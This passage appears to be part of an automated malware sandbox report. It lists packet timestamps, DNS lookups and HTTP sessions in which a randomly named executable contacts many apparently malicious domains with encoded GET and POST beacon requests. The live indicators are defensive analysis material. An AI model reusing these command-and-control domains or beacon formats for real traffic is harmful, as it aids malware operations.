                                                      Jul 3, 2024 17:46:25.071800947 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:25.076869011 CEST804977184.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:25.076958895 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:25.079884052 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:25.084841967 CEST804977184.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:25.547918081 CEST804977184.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:25.547987938 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:26.581342936 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:26.586579084 CEST804977184.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:27.817744970 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:28.148478985 CEST804977284.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:28.148607016 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:28.227508068 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:28.232530117 CEST804977284.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:28.617588997 CEST804977284.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:28.617731094 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:29.737657070 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:29.771718025 CEST804977284.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.767218113 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:30.772115946 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.772222042 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:30.811510086 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:30.816379070 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816469908 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816492081 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816519976 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816529036 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816562891 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816571951 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816607952 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816617012 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:31.413727999 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:31.416780949 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:32.331306934 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:32.336113930 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.350130081 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.355101109 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.355958939 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.361753941 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.370079041 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812366009 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812411070 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812423944 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812434912 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812447071 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812458992 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812470913 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812493086 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812587976 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.812587976 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.812706947 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812721968 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812812090 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.817722082 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.822921038 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:39.225827932 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:39.230624914 CEST804977538.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:39.231245041 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:39.233753920 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:39.238770962 CEST804977538.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:40.123665094 CEST804977538.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:40.126621962 CEST804977538.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:40.126672029 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:40.737574100 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:41.756134987 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:41.763585091 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:41.765846968 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:41.769730091 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:41.774575949 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:42.890132904 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:42.890209913 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:42.890259981 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:42.890474081 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:42.890515089 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:43.268841028 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:44.288501024 CEST4977780192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:44.293500900 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.293582916 CEST4977780192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:44.296518087 CEST4977780192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:44.301512957 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301527023 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301538944 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301547050 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301619053 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301661968 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301773071 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.303288937 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.304409981 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:45.266102076 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:45.315690041 CEST4977780192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:45.581538916 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:45.581612110 CEST4977780192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:45.801752090 CEST4977780192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:46.818571091 CEST4977880192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:46.823591948 CEST804977838.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:46.823792934 CEST4977880192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:46.825571060 CEST4977880192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:46.830415964 CEST804977838.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:47.722235918 CEST804977838.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:47.722582102 CEST804977838.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:47.723046064 CEST4977880192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:47.725735903 CEST4977880192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:47.730467081 CEST804977838.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:52.764998913 CEST4977980192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:52.769928932 CEST804977974.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:52.769998074 CEST4977980192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:52.771785975 CEST4977980192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:52.776607037 CEST804977974.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:53.361476898 CEST804977974.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:53.361496925 CEST804977974.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:53.361833096 CEST4977980192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:54.284835100 CEST4977980192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:55.311816931 CEST4978080192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:55.317040920 CEST804978074.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:55.323837042 CEST4978080192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:55.347995043 CEST4978080192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:55.353908062 CEST804978074.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:55.851665020 CEST804978074.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:55.852294922 CEST804978074.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:55.855868101 CEST4978080192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:56.846971035 CEST4978080192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:57.865454912 CEST4978180192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:57.870400906 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:57.870527983 CEST4978180192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:57.875768900 CEST4978180192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:57.880661011 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:57.880681992 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:57.880779982 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:57.880919933 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:57.880928993 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:57.880963087 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:57.880973101 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:57.881009102 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:57.882154942 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:58.458940983 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:58.458964109 CEST804978174.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:46:58.459059000 CEST4978180192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:46:59.378235102 CEST4978180192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:47:00.396900892 CEST4978280192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:47:00.401941061 CEST804978274.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:47:00.402060032 CEST4978280192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:47:00.404169083 CEST4978280192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:47:00.409804106 CEST804978274.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:47:00.950731993 CEST804978274.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:47:00.951651096 CEST804978274.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:47:00.951766968 CEST4978280192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:47:00.955782890 CEST4978280192.168.2.474.208.236.247
                                                      Jul 3, 2024 17:47:00.960571051 CEST804978274.208.236.247192.168.2.4
                                                      Jul 3, 2024 17:47:14.083745003 CEST4978380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:14.088696003 CEST804978384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:47:14.088762999 CEST4978380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:14.092008114 CEST4978380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:14.096824884 CEST804978384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:47:14.594597101 CEST804978384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:47:14.594722986 CEST4978380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:15.597006083 CEST4978380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:15.601918936 CEST804978384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:47:17.006804943 CEST4978480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:17.011842966 CEST804978484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:47:17.011933088 CEST4978480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:17.014297962 CEST4978480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:17.019102097 CEST804978484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:47:17.469547033 CEST804978484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:47:17.469628096 CEST4978480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:18.518980980 CEST4978480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:47:18.523906946 CEST804978484.32.84.32192.168.2.4

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jul 3, 2024 17:44:09.145859003 CEST6210253192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:44:09.518326044 CEST53621021.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:44:25.851687908 CEST5844053192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:44:25.883917093 CEST53584401.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:44:33.944195986 CEST6190653192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:44:33.955609083 CEST53619061.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:44:42.022901058 CEST5400753192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:44:42.045089960 CEST53540071.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:44:50.152816057 CEST5829053192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:44:50.590470076 CEST53582901.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:45:03.785026073 CEST6149653192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:45:03.800601959 CEST53614961.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:45:17.662944078 CEST5671853192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:45:18.028395891 CEST53567181.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:45:31.491866112 CEST5141753192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:45:31.757328987 CEST53514171.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:45:44.928782940 CEST5398053192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:45:44.946743965 CEST53539801.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:45:58.313688040 CEST5344453192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:45:58.333241940 CEST53534441.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:46:11.678380013 CEST5400853192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:46:11.694880962 CEST53540081.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:46:24.997287989 CEST5026053192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:46:25.068388939 CEST53502601.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:46:38.842376947 CEST5117953192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:46:39.220509052 CEST53511791.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:46:52.741866112 CEST6188853192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:46:52.762548923 CEST53618881.1.1.1192.168.2.4
                                                      Jul 3, 2024 17:47:05.961776972 CEST6015953192.168.2.41.1.1.1
                                                      Jul 3, 2024 17:47:05.998615026 CEST53601591.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jul 3, 2024 17:44:09.145859003 CEST192.168.2.41.1.1.10x7174Standard query (0)www.qdfake525pm.xyzA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:25.851687908 CEST192.168.2.41.1.1.10xfa7Standard query (0)www.com-kh.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:33.944195986 CEST192.168.2.41.1.1.10xdefeStandard query (0)www.ddi828media.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:42.022901058 CEST192.168.2.41.1.1.10x9e0fStandard query (0)www.miningarea.funA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:50.152816057 CEST192.168.2.41.1.1.10xb750Standard query (0)www.66hc7.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:03.785026073 CEST192.168.2.41.1.1.10x7ccbStandard query (0)www.katgstamps.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:17.662944078 CEST192.168.2.41.1.1.10x6d96Standard query (0)www.devele.topA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:31.491866112 CEST192.168.2.41.1.1.10x379aStandard query (0)www.valerieomage.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:44.928782940 CEST192.168.2.41.1.1.10x39dbStandard query (0)www.hissmjkl.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:58.313688040 CEST192.168.2.41.1.1.10xf78bStandard query (0)www.monchosoft.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:46:11.678380013 CEST192.168.2.41.1.1.10x5fbbStandard query (0)www.theweekendcreator.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:46:24.997287989 CEST192.168.2.41.1.1.10xfde1Standard query (0)www.saalameh.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:46:38.842376947 CEST192.168.2.41.1.1.10x4d1bStandard query (0)www.ybw73.topA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:46:52.741866112 CEST192.168.2.41.1.1.10x2dbdStandard query (0)www.kaps4kancer.orgA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:47:05.961776972 CEST192.168.2.41.1.1.10x8598Standard query (0)www.vivemasvivebien.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jul 3, 2024 17:44:09.518326044 CEST1.1.1.1192.168.2.40x7174No error (0)www.qdfake525pm.xyzqdfake525pm.xyzCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:44:09.518326044 CEST1.1.1.1192.168.2.40x7174No error (0)qdfake525pm.xyz38.150.29.6A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:25.883917093 CEST1.1.1.1192.168.2.40xfa7Name error (3)www.com-kh.comnonenoneA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:33.955609083 CEST1.1.1.1192.168.2.40xdefeName error (3)www.ddi828media.comnonenoneA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:42.045089960 CEST1.1.1.1192.168.2.40x9e0fName error (3)www.miningarea.funnonenoneA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:50.590470076 CEST1.1.1.1192.168.2.40xb750No error (0)www.66hc7.comkloeti.pc205kopl.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:44:50.590470076 CEST1.1.1.1192.168.2.40xb750No error (0)kloeti.pc205kopl.com162.209.189.212A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:50.590470076 CEST1.1.1.1192.168.2.40xb750No error (0)kloeti.pc205kopl.com162.209.189.210A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:44:50.590470076 CEST1.1.1.1192.168.2.40xb750No error (0)kloeti.pc205kopl.com162.209.189.211A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:03.800601959 CEST1.1.1.1192.168.2.40x7ccbNo error (0)www.katgstamps.comkatgstamps.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:45:03.800601959 CEST1.1.1.1192.168.2.40x7ccbNo error (0)katgstamps.com3.33.130.190A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:03.800601959 CEST1.1.1.1192.168.2.40x7ccbNo error (0)katgstamps.com15.197.148.33A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:18.028395891 CEST1.1.1.1192.168.2.40x6d96No error (0)www.devele.top162.0.213.72A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:31.757328987 CEST1.1.1.1192.168.2.40x379aNo error (0)www.valerieomage.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:45:31.757328987 CEST1.1.1.1192.168.2.40x379aNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:44.946743965 CEST1.1.1.1192.168.2.40x39dbNo error (0)www.hissmjkl.com172.67.137.15A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:44.946743965 CEST1.1.1.1192.168.2.40x39dbNo error (0)www.hissmjkl.com104.21.26.154A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:45:58.333241940 CEST1.1.1.1192.168.2.40xf78bNo error (0)www.monchosoft.com46.30.211.38A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:46:11.694880962 CEST1.1.1.1192.168.2.40x5fbbNo error (0)www.theweekendcreator.com217.160.0.87A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:46:25.068388939 CEST1.1.1.1192.168.2.40xfde1No error (0)www.saalameh.comsaalameh.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:46:25.068388939 CEST1.1.1.1192.168.2.40xfde1No error (0)saalameh.com84.32.84.32A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:46:39.220509052 CEST1.1.1.1192.168.2.40x4d1bNo error (0)www.ybw73.topybw73.topCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:46:39.220509052 CEST1.1.1.1192.168.2.40x4d1bNo error (0)ybw73.top38.47.232.233A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:46:52.762548923 CEST1.1.1.1192.168.2.40x2dbdNo error (0)www.kaps4kancer.org74.208.236.247A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:47:05.998615026 CEST1.1.1.1192.168.2.40x8598Name error (3)www.vivemasvivebien.comnonenoneA (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.qdfake525pm.xyz
                                                      • www.66hc7.com
                                                      • www.katgstamps.com
                                                      • www.devele.top
                                                      • www.valerieomage.com
                                                      • www.hissmjkl.com
                                                      • www.monchosoft.com
                                                      • www.theweekendcreator.com
                                                      • www.saalameh.com
                                                      • www.ybw73.top
                                                      • www.kaps4kancer.org

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.44974238.150.29.6803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:44:09.534791946 CEST419OUTGET /a24j/?lxRlvTSh=RsceReT900EWT/dwsr4j9O4BlXzkLceVZQ7aWeUSP6prvEVffZLEO15AIWxlHKHabVj2I55FGLI5L0C49uGheAnDVqmJ9AiU0eI6N3YkeR21zvyMSZqsHmQ=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.qdfake525pm.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:44:10.802591085 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.26.0
                                                      Date: Wed, 03 Jul 2024 15:46:43 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 2001
                                                      Connection: close
                                                      Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 30 3b 0a 09 09 09 7d 0a 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 46 45 46 45 46 3b 0a 09 09 09 09 66 6f 6e 74 3a 20 2e 39 65 6d 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 77 72 61 70 70 65 72 7b 0a 09 09 09 09 77 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Not Found</title><style type="text/css">* {margin:0;padding:0;}body {background-color:#EFEFEF;font: .9em "Lucida Sans Unicode", "Lucida Grande", sans-serif;}#wrapper{width:600px;margin:40px auto 0;text-align:center;-moz-box-shadow: 5px 5px 10px rgba(0,0,0,0.3);-webkit-box-shadow: 5px 5px 10px rgba(0,0,0,0.3);box-shadow: 5px 5px 10px rgba(0,0,0,0.3);}#wrapper h1{color:#FFF;text-align:center;margin-bottom:20px;}#wrapper a{display:block;font-size:.9em;padding-top:20px;color:#FFF;text-decoration:none;text-align:center;}#container {width:600px;padding-bottom:15px;background-color:#FFFFFF;}.navtop{height:40px;background-color:#24B2EB;padding:13px;}.content {padding:10px 10px 25px;bac [TRUNCATED]
                                                      Jul 3, 2024 17:44:10.802763939 CEST931INData Raw: 62 75 74 74 6f 6e 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 30 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 30 20 23 30 30 41 35 46 46 3b
                                                      Data Ascii: button{color:white;padding:15px 20px;text-shadow:1px 1px 0 #00A5FF;font-weight:bold;text-align:center;border:1px solid #24B2EB;margin:0px 200px;clear:both;background-color: #24B2EB;border-radiu


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449743162.209.189.212803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:44:50.602005959 CEST673OUTPOST /ooz9/ HTTP/1.1
                                                      Host: www.66hc7.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.66hc7.com
                                                      Referer: http://www.66hc7.com/ooz9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
